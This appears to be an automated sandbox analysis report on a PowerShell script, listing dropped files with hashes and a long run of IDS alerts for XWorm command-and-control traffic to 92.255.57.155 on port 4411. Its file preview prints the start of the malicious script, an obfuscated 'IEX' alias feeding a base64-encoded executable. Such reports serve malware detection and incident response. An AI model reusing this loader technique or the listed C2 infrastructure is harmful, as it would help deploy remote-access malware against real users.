                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:@...e................................................@..........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6221
                                    Entropy (8bit):3.720960520022621
                                    Encrypted:false
                                    SSDEEP:48:EYKZxNvLPr3C4U28Zj+ukvhkvklCywCmdUS+nwsl13SogZo90S+nwsl13SogZop1:G1v33CxHZLkvhkvCCtibwsCHNbwsCHW
                                    MD5:3DBF5EEA8FCA26371DD771A5E2DB41B1
                                    SHA1:D24B1145F77F4FC533A71BFEAF5C3A7F1912BA48
                                    SHA-256:DF4CC729574A9A523A34682494EBA920C61E14BA8A94FAB2C6919A80512EFDC6
                                    SHA-512:F412A9D8A7926FF76AFD4FB89CBC89BFE785C6699DEE98BBEA38F651B63EC840E8F6949CEC058D9BAC57908045EA57A0CE7D1B584FF35E63F17E21FAE084111A
                                    Malicious:false
                                    Preview:...................................FL..................F.".. ...-/.v....!..~.Y..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......z.Y..>.,~.Y......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.F...........................%..A.p.p.D.a.t.a...B.V.1......Y.F..Roaming.@......CW.^.Y.F..........................7...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y.F..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.F....Q...........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6221
                                    Entropy (8bit):3.720960520022621
                                    Encrypted:false
                                    SSDEEP:48:EYKZxNvLPr3C4U28Zj+ukvhkvklCywCmdUS+nwsl13SogZo90S+nwsl13SogZop1:G1v33CxHZLkvhkvCCtibwsCHNbwsCHW
                                    MD5:3DBF5EEA8FCA26371DD771A5E2DB41B1
                                    SHA1:D24B1145F77F4FC533A71BFEAF5C3A7F1912BA48
                                    SHA-256:DF4CC729574A9A523A34682494EBA920C61E14BA8A94FAB2C6919A80512EFDC6
                                    SHA-512:F412A9D8A7926FF76AFD4FB89CBC89BFE785C6699DEE98BBEA38F651B63EC840E8F6949CEC058D9BAC57908045EA57A0CE7D1B584FF35E63F17E21FAE084111A
                                    Malicious:false
                                    Preview:...................................FL..................F.".. ...-/.v....!..~.Y..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......z.Y..>.,~.Y......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.F...........................%..A.p.p.D.a.t.a...B.V.1......Y.F..Roaming.@......CW.^.Y.F..........................7...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y.F..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.F....Q...........
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.466344622931147
                                    Encrypted:false
                                    SSDEEP:6144:3IXfpi67eLPU9skLmb0b4QWSPKaJG8nAgejZMMhA2gX4WABl0uNfdwBCswSb+:4XD94QWlLZMM6YFHl++
                                    MD5:AEAA3F38568B1100D534ECC4F8A9FF10
                                    SHA1:34DD4AD387F6209BF05D5A3C9222643CB393281E
                                    SHA-256:37BC7A72782B787515C5FEB12FCBC261612D3BEE453FABEA99903356DC7A7C67
                                    SHA-512:1BE2828D2E02FFA907144174CC9693290FB303AF83DDCF0639ED3E8182C7441501BD0C5BC6F2540D6D1A11C3648B82D259F739E3114765F67F5D013BD78C9658
                                    Malicious:false
                                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.o...Y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    File type:ASCII text, with very long lines (65461), with CRLF line terminators
                                    Entropy (8bit):5.189067791033469
                                    TrID:
                                      File name:92.255.57.155.ps1
                                      File size:333'029 bytes
                                      MD5:f555029ba45bc9f18b451066721785c8
                                      SHA1:930ea2fb160b84b3fd841aebd5a462896eccd400
                                      SHA256:d6e3fbc61a201ac72495e59f7f2f3967e2ecf11f54675618a17b2ab4986e6f8b
                                      SHA512:33312f8bf6abba5c02a6f9ed5464c64c57656f6b747049c68dc67052dca31ace0c631c4cbbb4351944c081d8a70bc49db6da835562149305749f28d984213b3e
                                      SSDEEP:6144:yeAKzAgnVwyuKXwB4c4K15IiTksfUXLID5uzynrKMk8kRJs9Skjugiwuz/vVnich:nGYvUcJrk6TKW
                                      TLSH:44642C318804B91FCEEF1F87B5002FD27C79257BDF591018A98F16B96A68238597AF70
                                      File Content Preview:ipconfig /flushdns...... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$JOOOO="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQ
                                      Icon Hash:3270d6baae77db44
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-12-29T09:49:16.109200+01002858800ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:49:16.560934+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:49:16.610128+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:49:29.301964+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:49:29.301964+01002858801ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:49:30.464963+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:49:30.466737+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:49:44.402294+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:49:44.404637+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:49:58.404895+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:49:58.406885+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:49:59.328119+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:03.029819+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:03.047504+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:03.964582+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:04.172071+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:04.245200+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:04.292081+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:04.364800+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:04.455341+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:04.484146+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:04.667286+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:04.786671+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:04.814163+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:04.950315+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:05.692558+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:05.714918+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:05.902574+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:05.913851+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:06.044909+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:06.060632+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:06.869260+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:07.000734+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:07.045873+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:07.120152+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:07.256110+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:07.379455+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:07.379532+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:07.540764+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:07.569545+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:07.660213+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:08.464730+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:08.473940+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:08.675163+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:08.803911+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:08.887654+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:08.913204+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:09.043552+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:09.163558+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:09.622287+01002858799ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:10.074005+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:10.085689+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:10.417934+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:10.715280+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:10.868985+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:10.944601+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:10.967271+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:11.520798+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:11.597885+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:11.611605+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:11.760592+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:12.549466+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:12.759741+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:12.783218+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:12.874435+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:12.879169+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:13.089706+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:13.092410+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:13.204806+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:13.215338+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:13.342990+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:13.347191+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:13.414813+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:13.508742+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:13.545363+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:13.630052+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:14.605324+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:14.664090+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:14.815830+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:14.817332+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:14.874751+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:14.980694+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:15.026044+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:15.106876+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:15.147035+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:15.228324+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:16.090356+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:16.527221+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:16.737455+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:16.796176+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:16.796283+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:16.856975+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:17.067356+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:17.195385+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:17.405988+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:17.476686+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:17.529253+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:17.639428+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:18.574130+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:18.599894+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:18.784637+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:18.814311+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:18.904468+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:18.933617+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:19.263348+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:19.292357+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:20.809032+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:20.837412+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:21.047340+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:21.076005+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:21.496954+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:21.539001+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:21.539311+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:21.656884+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:21.791442+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:22.413793+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:22.416426+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:23.032242+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:23.153286+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:23.218153+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:23.321307+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:23.362255+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:23.440756+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:23.483258+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:23.560131+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:23.651202+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:23.679769+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:23.770698+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
                                      2024-12-29T09:50:23.801288+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973092.255.57.1554411TCP
                                      2024-12-29T09:50:24.337402+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.449730TCP
